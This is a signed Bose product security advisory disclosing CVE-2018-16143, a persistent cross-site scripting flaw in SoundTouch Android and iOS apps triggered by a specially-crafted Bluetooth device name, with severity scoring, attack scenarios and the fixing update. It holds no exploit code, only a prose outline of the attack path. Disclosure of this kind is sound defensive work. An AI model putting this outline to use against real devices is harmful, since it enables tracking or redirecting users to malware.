-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Bose Product Security Advisory This advisory from Bose is to provide information to users of certain products regarding a security concern that has been identified in one or more of our products. The information contained in this advisory is intended to help customers understand the nature of the security concern, which products are impacted by this issue, and what steps customers may take to avoid the concern. Security Concern ================ Bose SoundTouch mobile applications for Android and iOS, interface versions 19.1.7 and earlier, contain a persistent cross-site scripting (XSS) vulnerability when displaying the device name of Bluetooth connected devices in the device status page. This may allow a malicious user to execute arbitrary Javascript in the context of the mobile application. Applications potentially affected by this issue include the following versions: * Bose SoundTouch mobile application for Android - Interface version 19.1.7 and earlier * Bose SoundTouch mobile application for iOS - Interface version 19.1.7 and earlier Interface update 19.1.9 addresses this issue. For more detailed information, please see the full report below. ================================================================ Bose Advisory 2018-002 Revision: 1.1 Revision Date: 12 SEP 2018 CVE Identifier: CVE-2018-16143 Summary: Cross-site scripting vulnerability in Bose SoundTouch mobile applications for Android and iOS, interface versions 19.1.7 and earlier Affected CWEs: CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') CVSS v3 Score: 4.6/Medium (CVSS:3.0/AV:A/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N) Detailed Description ~~~~~~~~~~~~~~~~~~~~ Bose SoundTouch mobile applications, for Android and iOS respectively, interface versions 19.1.7 and earlier, contain a persistent cross-site scripting (XSS) vulnerability when displaying the name of Bluetooth connected devices in the device status dialog. The specific impact is context-specific and will depend upon the applications and capabilities of the user's mobile device. An attacker could leverage this vulnerability to trick a user into performing some action such as visiting an attacker-controlled website for malicious purposes (see below). For an attacker to successfully cause an impact, an attacker must be able to connect to/pair with a Bose product via Bluetooth using a device with a specially-crafted name, which is then displayed in the Bose SoundTouch application when a user views the status of the Bose product. In a multi-device setup, an attacker connecting to any device in the setup would potentially enable successful exploitation. How serious is this issue ~~~~~~~~~~~~~~~~~~~~~~~~~ An estimated severity for this issue was calculated using the Common Vulnerability Scoring System (CVSS) v3, an industry standard method of scoring the seriousness of security issues. The estimated severity for this issue has been calculated to be: 4.6/Medium (CVSS:3.0/AV:A/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N) What does this mean in practice ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ * A malicious individual who wishes to exploit this issue to cause harm must be within range of Bluetooth (around 100 meters / 328 feet) to a user's product. No special skills or tools are required. * The user (victim) must run the Bose SoundTouch mobile application, and must view the device status page, to be impacted. * If successful exploitation occurs, the impact is initially on the user's mobile device. Attack scenarios include attempting to redirect a user of the product to a malicious server hosted by the attacker to e.g. deliver malware, or to track the user based on information set by the attacker, or to attempt to access applications in use on the user's mobile device. Mitigations ~~~~~~~~~~~ Users of the Bose SoundTouch application for Android or iOS will be automatically updated to interface version 19.1.9 (or newer) on their next use of the application. Credit & References ~~~~~~~~~~~~~~~~~~~ This issue was responsibly disclosed to Bose by an independent security researcher. Bose would like to thank this researcher for working with Bose to investigate and remediate this issue. Aditya Gujar, www.betterhacker.com -----BEGIN PGP SIGNATURE----- Version: GnuPG v1 iQEcBAEBAgAGBQJcF9PNAAoJEPneBdGXcm32dv8IAJ3UEM30cSasAflgfGv/a+Fn LhxUAjfjc6D1TvDdSpJN1aDiNC1A6MaLTI6unTP40+bm8Ypc0Q/hFuETQ4v86OJ2 437G/gQmqDPP1enMZ+eRfFDG1a2GHJ+AJR7NbQfLBc2qkC6YNHX3FbYMhVX7ibp7 W1ul2grKWqaGuVwn0N8+JbK3oo5gcqSr30tjpKJYVQjfB6PM8rYKCPHlXcPQZoQ7 ZxaQXTzWS+WMeAS9eJ8TH1UOCmMufZLE3wzT8AOPU8Mmw6o+FPSnkS4ddILWEQJ3 oiNQptMXyecBvwMRi/WuV/bczrZ2A5LYS4lTbxw4at+H5mw2e/KcKQGmF3DD+ZQ= =p4Zd -----END PGP SIGNATURE-----